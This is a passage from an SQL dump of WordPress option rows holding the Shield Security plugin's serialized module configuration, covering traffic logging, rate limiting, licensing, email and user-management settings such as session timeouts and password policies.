14:\"audit_multiple\";b:1;}s:10:\"user_login\";a:1:{s:7:\"context\";s:5:\"users\";}s:14:\"user_login_app\";a:1:{s:7:\"context\";s:5:\"users\";}s:15:\"user_registered\";a:1:{s:7:\"context\";s:5:\"users\";}s:12:\"user_deleted\";a:2:{s:7:\"context\";s:5:\"users\";s:14:\"audit_multiple\";b:1;}s:23:\"user_deleted_reassigned\";a:1:{s:7:\"context\";s:5:\"users\";}s:18:\"email_attempt_send\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}s:18:\"email_send_invalid\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(450858,'shield_mod_config_bab7bd198f063e113dcaca381562402b','a:7:{s:4:\"slug\";s:12:\"integrations\";s:10:\"properties\";a:15:{s:4:\"slug\";s:12:\"integrations\";s:11:\"storage_key\";s:12:\"integrations\";s:4:\"name\";s:12:\"Integrations\";s:10:\"menu_title\";s:12:\"Integrations\";s:19:\"show_module_options\";b:1;s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:19:\"run_if_verified_bot\";b:1;s:14:\"skip_processor\";b:0;s:16:\"tracking_exclude\";b:0;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:1;}s:8:\"sections\";a:2:{i:0;a:4:{s:4:\"slug\";s:20:\"section_integrations\";s:7:\"primary\";b:1;s:5:\"title\";s:12:\"Integrations\";s:11:\"title_short\";s:12:\"Integrations\";}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:13:\"enable_mainwp\";s:7:\"section\";s:20:\"section_integrations\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ir\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Enable MainWP\";s:7:\"summary\";s:36:\"Enable The Built-In MainWP Extension\";s:11:\"description\";s:86:\"This option will enable Shield\'s built-in MainWP extension for both server and client.\";}}s:11:\"definitions\";a:1:{s:6:\"events\";a:0:{}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420390,'shield_mod_config_c384b199040d4b4be2e980776698e0fd','a:8:{s:4:\"slug\";s:7:\"traffic\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"traffic\";s:4:\"name\";s:13:\"Traffic Watch\";s:12:\"sidebar_name\";s:7:\"Traffic\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"traffic\";s:7:\"tagline\";s:31:\"Watch All Requests To Your Site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:110;}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:11:\"Traffic Log\";s:4:\"slug\";s:16:\"traffic-redirect\";s:8:\"callback\";s:0:\"\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:16:\"traffic-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"traffic\";}}}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:23:\"section_traffic_options\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Traffic Watch Options\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Provides finer control over the live traffic system.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:4:{s:4:\"slug\";s:23:\"section_traffic_limiter\";s:5:\"title\";s:21:\"Traffic Rate Limiting\";s:11:\"title_short\";s:13:\"Rate Limiting\";s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Provides ability to restrict excessive requests from a single visitor.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_traffic\";s:5:\"title\";s:28:\"Enable Module: Traffic Watch\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - The Traffic Watch module lets you monitor and review all requests to your site.\";i:1;s:103:\"Recommendation - Required only if you need to review and investigate and monitor requests to your site.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:10:{s:3:\"key\";s:14:\"enable_traffic\";s:7:\"section\";s:37:\"section_enable_plugin_feature_traffic\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ed\";s:9:\"link_blog\";s:19:\"https://shsec.io/ee\";s:4:\"name\";s:20:\"Enable Traffic Watch\";s:7:\"summary\";s:44:\"Enable (or Disable) The Traffic Watch Module\";s:11:\"description\";s:73:\"Un-Checking this option will completely disable the Traffic Watch module.\";}i:1;a:9:{s:3:\"key\";s:13:\"enable_logger\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hf\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Enable Traffic Logger\";s:7:\"summary\";s:35:\"Turn On The Traffic Logging Feature\";s:11:\"description\";s:71:\"Enable or disable the ability to log and monitor requests to your site.\";}i:2;a:11:{s:3:\"key\";s:15:\"type_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:4:\"type\";s:15:\"multiple_select\";s:8:\"advanced\";b:1;s:7:\"default\";a:4:{i:0;s:9:\"logged_in\";i:1;s:4:\"cron\";i:2;s:6:\"search\";i:3;s:6:\"uptime\";}s:13:\"value_options\";a:7:{i:0;a:2:{s:9:\"value_key\";s:6:\"simple\";s:4:\"text\";s:15:\"Simple Requests\";}i:1;a:2:{s:9:\"value_key\";s:3:\"api\";s:4:\"text\";s:8:\"REST API\";}i:2;a:2:{s:9:\"value_key\";s:4:\"ajax\";s:4:\"text\";s:4:\"AJAX\";}i:3;a:2:{s:9:\"value_key\";s:9:\"logged_in\";s:4:\"text\";s:15:\"Logged-In Users\";}i:4;a:2:{s:9:\"value_key\";s:4:\"cron\";s:4:\"text\";s:7:\"WP CRON\";}i:5;a:2:{s:9:\"value_key\";s:6:\"search\";s:4:\"text\";s:14:\"Search Engines\";}i:6;a:2:{s:9:\"value_key\";s:6:\"uptime\";s:4:\"text\";s:26:\"Uptime Monitoring Services\";}}s:9:\"link_info\";s:19:\"https://shsec.io/eb\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Traffic Log Exclusions\";s:7:\"summary\";s:41:\"Select Which Types Of Requests To Exclude\";s:11:\"description\";s:74:\"Deselect any requests that you don\'t want to appear in the traffic viewer.\";}i:3;a:11:{s:3:\"key\";s:17:\"custom_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/ec\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Custom Exclusions\";s:7:\"summary\";s:33:\"Provide Custom Traffic Exclusions\";s:11:\"description\";s:98:\"For each entry, if the text is present in either the User Agent or Page/Path, it will be excluded.\";}i:4;a:11:{s:3:\"key\";s:10:\"auto_clean\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"default\";i:3;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Auto Expiry Cleaning\";s:7:\"summary\";s:30:\"Enable Traffic Log Auto Expiry\";s:11:\"description\";s:78:\"Automated DB cleanup will delete logs older than this maximum value (in days).\";}i:5;a:12:{s:3:\"key\";s:11:\"max_entries\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Max Log Length\";s:7:\"summary\";s:34:\"Maximum Traffic Log Length To Keep\";s:11:\"description\";s:81:\"Automated DB cleanup will delete logs to maintain this maximum number of records.\";}i:6;a:10:{s:3:\"key\";s:14:\"enable_limiter\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gw\";s:9:\"link_blog\";s:19:\"https://shsec.io/gx\";s:4:\"name\";s:20:\"Enable Rate Limiting\";s:7:\"summary\";s:33:\"Turn On The Rate Limiting Feature\";s:11:\"description\";s:87:\"Enable or disable the rate limiting feature according to your rate limiting parameters.\";}i:7;a:10:{s:3:\"key\";s:14:\"limit_requests\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Max Request Limit\";s:7:\"summary\";s:48:\"Maximum Number Of Requests Allowed In Time Limit\";s:11:\"description\";s:72:\"The maximum number of requests that are allowed in the given time limit.\";}i:8;a:10:{s:3:\"key\";s:15:\"limit_time_span\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Request Limit Time Interval\";s:7:\"summary\";s:48:\"The Time Interval To Test For Excessive Requests\";s:11:\"description\";s:84:\"The time limit within which to monitor for excessive requests that exceed the limit.\";}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"traffic\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Traffic\\Handler\";}s:18:\"traffic_table_name\";s:7:\"traffic\";s:21:\"traffic_table_columns\";a:8:{s:3:\"rid\";s:52:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Request ID\'\";s:3:\"uid\";s:53:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'User ID\'\";s:2:\"ip\";s:55:\"varbinary(16) DEFAULT NULL COMMENT \'Visitor IP Address\'\";s:4:\"path\";s:54:\"text NOT NULL DEFAULT \'\' COMMENT \'Request Path or URI\'\";s:4:\"code\";s:58:\"int(5) NOT NULL DEFAULT \'200\' COMMENT \'HTTP Response Code\'\";s:4:\"verb\";s:56:\"varchar(10) NOT NULL DEFAULT \'get\' COMMENT \'HTTP Method\'\";s:2:\"ua\";s:40:\"text COMMENT \'Browser User Agent String\'\";s:5:\"trans\";s:61:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Trangression\'\";}s:6:\"events\";a:1:{s:22:\"request_limit_exceeded\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420391,'shield_mod_config_e76004361d96930adefd86d99ce6c323','a:7:{s:4:\"slug\";s:7:\"license\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"license\";s:4:\"name\";s:12:\"Pro Security\";s:10:\"menu_title\";s:7:\"Go Pro!\";s:21:\"show_module_menu_item\";b:1;s:19:\"highlight_menu_item\";b:1;s:7:\"tagline\";s:44:\"The Best In WordPress Security, Only Better.\";s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:7:\"license\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:13:\"admin_notices\";a:1:{s:19:\"wphashes-token-fail\";a:6:{s:2:\"id\";s:19:\"wphashes-token-fail\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:12:{i:0;a:6:{s:3:\"key\";s:11:\"license_key\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:1;a:5:{s:3:\"key\";s:20:\"license_activated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:2;a:5:{s:3:\"key\";s:22:\"license_deactivated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:3;a:5:{s:3:\"key\";s:23:\"license_last_checked_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:4;a:5:{s:3:\"key\";s:26:\"last_warning_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:5;a:5:{s:3:\"key\";s:30:\"last_deactivated_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:6;a:5:{s:3:\"key\";s:11:\"last_errors\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";s:0:\"\";}i:7;a:6:{s:3:\"key\";s:13:\"last_error_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:8;a:6:{s:3:\"key\";s:22:\"keyless_handshake_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:9;a:6:{s:3:\"key\";s:23:\"keyless_handshake_until\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:10;a:6:{s:3:\"key\";s:12:\"license_data\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:11;a:5:{s:3:\"key\";s:18:\"wphashes_api_token\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:10:{s:21:\"license_store_url_api\";s:59:\"https://api.getshieldsecurity.com/wp-json/odp-eddkeyless/v1\";s:10:\"keyless_cp\";s:19:\"https://shsec.io/c5\";s:17:\"license_item_name\";s:19:\"Shield Security Pro\";s:15:\"license_item_id\";s:4:\"6047\";s:20:\"license_item_name_sc\";s:40:\"Shield Security Pro (via Shield Central)\";s:22:\"lic_verify_expire_days\";i:7;s:28:\"lic_verify_expire_grace_days\";i:3;s:7:\"keyless\";b:1;s:24:\"keyless_handshake_expire\";i:90;s:6:\"events\";a:3:{s:17:\"lic_check_success\";a:1:{s:4:\"stat\";b:0;}s:14:\"lic_fail_email\";a:1:{s:4:\"stat\";b:0;}s:19:\"lic_fail_deactivate\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420392,'shield_mod_config_c375e78b36bce01d6675f81b6f4dd0b1','a:6:{s:4:\"slug\";s:5:\"email\";s:10:\"properties\";a:12:{s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:5:\"email\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:0:{}s:7:\"options\";a:0:{}s:10:\"meta_modts\";i:1611420210;}','yes'),(420382,'shield_mod_config_e98d7077bafda99d19fce306d6112e8e','a:6:{s:4:\"slug\";s:15:\"user_management\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"user_management\";s:4:\"name\";s:15:\"User Management\";s:12:\"sidebar_name\";s:5:\"Users\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:15:\"user_management\";s:7:\"tagline\";s:61:\"Control user sessions, duration, timeouts and account sharing\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:31:\"section_user_session_management\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"User Session Management\";s:11:\"title_short\";s:15:\"Session Options\";s:7:\"summary\";a:2:{i:0;s:119:\"Purpose - Allows you to better control user sessions on your site and expire idle sessions and prevent account sharing.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:16:\"section_user_reg\";s:5:\"title\";s:17:\"User Registration\";s:11:\"title_short\";s:17:\"User Registration\";s:7:\"summary\";a:2:{i:0;s:53:\"Purpose - Control user registration and prevent SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:5:{s:4:\"slug\";s:17:\"section_passwords\";s:4:\"reqs\";a:1:{s:6:\"wp_min\";s:3:\"4.4\";}s:5:\"title\";s:17:\"Password Policies\";s:11:\"title_short\";s:17:\"Password Policies\";s:7:\"summary\";a:2:{i:0;s:69:\"Purpose - Have full control over passwords used by users on the site.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:3;a:4:{s:4:\"slug\";s:15:\"section_suspend\";s:5:\"title\";s:36:\"Automatic And Manual User Suspension\";s:11:\"title_short\";s:15:\"User Suspension\";s:7:\"summary\";a:2:{i:0;s:75:\"Purpose - Automatically suspend accounts to prevent login by certain users.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:4;a:4:{s:4:\"slug\";s:32:\"section_admin_login_notification\";s:5:\"title\";s:24:\"Admin Login Notification\";s:11:\"title_short\";s:13:\"Notifications\";s:7:\"summary\";a:2:{i:0;s:125:\"Purpose - So you can be made aware of when a WordPress administrator has logged into your site when you are not expecting it.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:5;a:4:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:5:\"title\";s:30:\"Enable Module: User Management\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:148:\"Purpose - User Management offers real user sessions, finer control over user session time-out, and ensures users have logged-in in a correct manner.\";i:1;s:60:\"Recommendation - Keep the User Management feature turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{i:0;a:10:{s:3:\"key\";s:22:\"enable_user_management\";s:7:\"section\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e3\";s:9:\"link_blog\";s:19:\"https://shsec.io/hi\";s:4:\"name\";s:22:\"Enable User Management\";s:7:\"summary\";s:46:\"Enable (or Disable) The User Management module\";s:11:\"description\";s:74:\"Un-Checking this option will completely disable the User Management module\";}i:1;a:11:{s:3:\"key\";s:36:\"enable_user_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:7:\"premium\";b:1;s:9:\"sensitive\";b:0;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e2\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:29:\"User Login Notification Email\";s:7:\"summary\";s:58:\"Send Email Notification To Each User Upon Successful Login\";s:11:\"description\";s:85:\"A notification is sent to each user when a successful login occurs for their account.\";}i:2;a:10:{s:3:\"key\";s:37:\"enable_admin_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Admin Login Notification Email\";s:7:\"summary\";s:53:\"Send An Notification Email When Administrator Logs In\";s:11:\"description\";s:168:\"If you would like to be notified every time an administrator user logs into this WordPress site, enter a notification email address. No email address - No Notification.\";}i:3;a:10:{s:3:\"key\";s:24:\"session_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:2;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Session Timeout\";s:7:\"summary\";s:65:\"Specify How Many Days After Login To Automatically Force Re-Login\";s:11:\"description\";s:75:\"WordPress default is 2 days, or 14 days if you check the \'Remember Me\' box.\";}i:4;a:10:{s:3:\"key\";s:29:\"session_idle_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:48;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:70:\"https://icontrolwp.freshdesk.com/support/solutions/articles/3000070590\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Idle Timeout\";s:7:\"summary\";s:68:\"Specify How Many Hours After Inactivity To Automatically Logout User\";s:11:\"description\";s:157:\"If the user is inactive for the number of hours specified, they will be forcefully logged out next time they return. Set this to \'0\' to turn off this option.\";}i:5;a:10:{s:3:\"key\";s:21:\"session_lock_location\";s:7:\"section\";s:31:\"section_user_session_management\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Lock To Location\";s:7:\"summary\";s:34:\"Locks A User Session To IP address\";s:11:\"description\";s:211:\"When selected, a session is restricted to the same IP address as when the user logged in. If a logged-in user\'s IP address changes, the session will be invalidated and they\'ll be forced to re-login to WordPress.\";}i:6;a:10:{s:3:\"key\";s:33:\"session_username_concurrent_limit\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Max Simultaneous Sessions\";s:7:\"summary\";s:49:\"Limit Simultaneous Sessions For The Same Username\";s:11:\"description\";s:137:\"The number provided here is the maximum number of simultaneous, distinct, sessions allowed for any given username. Use \'0\' for no limits.\";}i:7;a:11:{s:3:\"key\";s:18:\"reg_email_validate\";s:7:\"section\";s:16:\"section_user_reg\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:3:\"log\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:8:\"Log Only\";}i:2;a:2:{s:9:\"value_key\";s:7:\"offense\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:24:\"Immediate Block and Kill\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:19:\"https://shsec.io/hh\";s:4:\"name\";s:24:\"Validate Email Addresses\";s:7:\"summary\";s:55:\"Validate Email Addresses When User Attempts To Register\";s:11:\"description\";s:56:\"Validate Email Addresses When User Attempts To Register.\";}i:8;a:10:{s:3:\"key\";s:12:\"email_checks\";s:7:\"section\";s:16:\"section_user_reg\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:6:\"syntax\";i:1;s:6:\"domain\";}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"syntax\";s:4:\"text\";s:20:\"Email Address Syntax\";}i:1;a:2:{s:9:\"value_key\";s:17:\"domain_registered\";s:4:\"text\";s:20:\"Domain Is Registered\";}i:2;a:2:{s:9:\"value_key\";s:15:\"domain_resolves\";s:4:\"text\";s:20:\"Domain Resolve To IP\";}i:3;a:2:{s:9:\"value_key\";s:2:\"mx\";s:4:\"text\";s:9:\"Domain MX\";}i:4;a:2:{s:9:\"value_key\";s:13:\"nondisposable\";s:4:\"text\";s:24:\"Disposable Email Service\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:19:\"https://shsec.io/hh\";s:4:\"name\";s:12:\"Email Checks\";s:7:\"summary\";s:48:\"The Email Address Properties That Will Be Tested\";s:11:\"description\";s:14:\"Select which .\";}i:9;a:9:{s:3:\"key\";s:24:\"enable_password_policies\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/e1\";s:9:\"link_blog\";s:19:\"https://shsec.io/c4\";s:4:\"name\";s:24:\"Enable Password Policies\";s:7:\"summary\";s:34:\"Enable The Password Policies Below\";s:11:\"description\";s:34:\"Turn on/off all password policies.\";}i:10;a:9:{s:3:\"key\";s:18:\"pass_prevent_pwned\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/by\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Prevent Pwned Passwords\";s:7:\"summary\";s:30:\"Prevent Use Of Pwned Passwords\";s:11:\"description\";s:94:\"Prevents users from using any passwords found on the public available list of pwned passwords.\";}i:11;a:10:{s:3:\"key\";s:15:\"pass_min_length\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"12\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Minimum Length\";s:7:\"summary\";s:23:\"Minimum Password Length\";s:11:\"description\";s:79:\"All passwords that a user sets must be at least this many characters in length.\";}i:12;a:11:{s:3:\"key\";s:17:\"pass_min_strength\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:1:\"4\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:9:\"Very Weak\";}i:1;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Weak\";}i:2;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:6:\"Strong\";}i:4;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:11:\"Very Strong\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Minimum Strength\";s:7:\"summary\";s:25:\"Minimum Password Strength\";s:11:\"description\";s:63:\"All passwords that a user sets must meet this minimum strength.\";}i:13;a:10:{s:3:\"key\";s:19:\"pass_force_existing\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Apply To Existing Users\";s:7:\"summary\";s:61:\"Apply Password Policies To Existing Users and Their Passwords\";s:11:\"description\";s:104:\"Forces existing users to update their passwords if they don\'t meet requirements, after they next login .\";}i:14;a:11:{s:3:\"key\";s:11:\"pass_expire\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Password Expiration\";s:7:\"summary\";s:37:\"Passwords Expire After This Many Days\";s:11:\"description\";s:81:\"Users will be forced to reset their passwords after the number of days 